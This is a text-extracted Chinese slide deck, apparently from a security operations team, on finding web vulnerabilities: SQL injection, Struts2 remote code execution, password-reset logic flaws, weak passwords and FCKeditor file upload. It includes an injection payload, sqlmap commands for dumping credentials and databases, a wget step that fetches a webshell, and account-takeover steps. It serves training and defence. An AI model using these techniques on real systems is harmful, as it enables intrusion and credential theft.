漏洞挖掘方法交流.pptxVIP

常规漏洞挖掘交流简单点，挖洞的方式简单点省NOC（SOC）认真 务实 敬业 求精目录目录1漏洞简介及案例SQL注入? Struts2远程代码执行? 业务逻辑? 越权访问&弱口令? 文件上传? 其他Contents2漏洞挖掘小tips、一、漏洞简介-SQL注入1?漏洞定义 SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中，再将这些参数 传递给后台的SQL数据库加以解析并执行的漏洞?漏洞原理 web开发人员未能在传递给SQL查询之前验证从web表单、cookie及输入参数等 收到的值，那么通常会出现SQL注入漏洞?漏洞危害 攻击者可潜在地操纵数据库中的数据，提取更多应用允许范围内的数据，并可能 在数据库服务器上执行系统命令（万能密码：’or ‘1’=‘1）SQL注入产生的过程客户端用户查看id为1的文章返回的网页显示给用户请 求返 回/a.php?id=1脚本程序Select * from test where id=1处理返回记录：过滤、编码等请 求返 回查询test表中id为1的所有记录返回查询到的数据数据库认真 务实 敬业 求精一、漏洞简介-SQL注入2?漏洞检测手段? 寻找如下形式的网页链接：//**.asp?id=xx//**.aspx?id=xx//**.php?id=xx//**.jsp?id=xx? 单引号法、and 1=1 、 and 1=2?漏洞利用工具-sqlmap信息收集：#python sqlmap.py -u URL--batch列出账号密码：#python sqlmap.py -u URL --passwords暴库名/表名/字段名：#python sqlmap.py -u URL --dbs/--tables/--columns?注入点批量检测? 法1（多链接检测）：sqlmap.py -m url.txt --batch法2（burpsuite日志）：sqlmap.py -l logs.txt --batch内联SQL注入终止式SQL注入认真 务实 敬业 求精二、Struts2远程代码执行漏洞【Struts2远程代码执行漏洞】ApacheStruts框架是一个基于Java Servlets,JavaBeans, 和 JavaServer Pages (JSP)的Web应用框架的开源项目。?漏洞危害?攻击者通过漏洞利用工具可任意上传后门脚本?获取服务器权限，访问全部数据库信息?防范手段?低版本struts2存在远程命令执行漏洞，建议升级至最新版 本?如升级后对系统业务造成影响，可对struts2 u0023参数 调用和前端get请求进行过滤。? 漏洞危害?寻找.do或.action的链接，一般用k8可测试? 案例?S2-019&devmode：/login.do/login.do?一句话上传：wget http://xxx/1.jsphttp://xxx/1.jsp认真 务实 敬业 求精三、业务逻辑漏洞漏洞?漏洞原理 是由于业务处理流程不清、逻辑性差、检 测不严引起的一系列漏洞?漏洞形式 包括任意密码修改、“0”元购买、短信/邮件/电话轰炸等，以“0”元购买为例，用户利用 工具可将购买的物品数量修改为负数，从而大幅减少 总的付款额?防范手段 1.梳理业务逻辑，避免业务流程漏洞；2. 数据安全校验，提高对用户本地提交数据的校验及过 滤力度，原则上不信任用户本地数据。页面展示层请 求返 回业务逻辑层请 求返 回数据操作层请 求返 回数据存储层认真 务实 敬业 求精三、业务逻辑漏洞漏洞-密码找回?姿势1：修改接收手机号?实现步骤?模拟admin用户使用密码找回功能?抓包获取接收验证码的手机号?修改并提交admin用户绑定的手机号为自己 的手机号?重新获取验证码?提交验证码和自己的手机号，密码重置成功①②③⑤④认真 务实 敬业 求精三、业务逻辑漏洞漏洞-密码找回?姿势2：修改回包验证认真 务实 敬业 求精三、业务逻辑漏洞漏洞-密码找回?姿势3：验证码暴破三、业务逻辑漏洞漏洞-短信/邮件/电话轰炸认真 务实 敬业 求精四、越权访问漏洞&弱口令案例1：未授权访问四、越权访问漏洞&弱口令案例2：弱口令数据库弱口令四、越权访问漏洞&弱口令案例2：弱口令web服务弱口令认真 务实 敬业 求精五、文件上传漏洞1FCKeditor上传漏洞? 文件上传->上传木马/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=conn ectors/jsp/connector? 目录遍历->确定路径 jsp：/FCKeditor/editor/filemanager/browser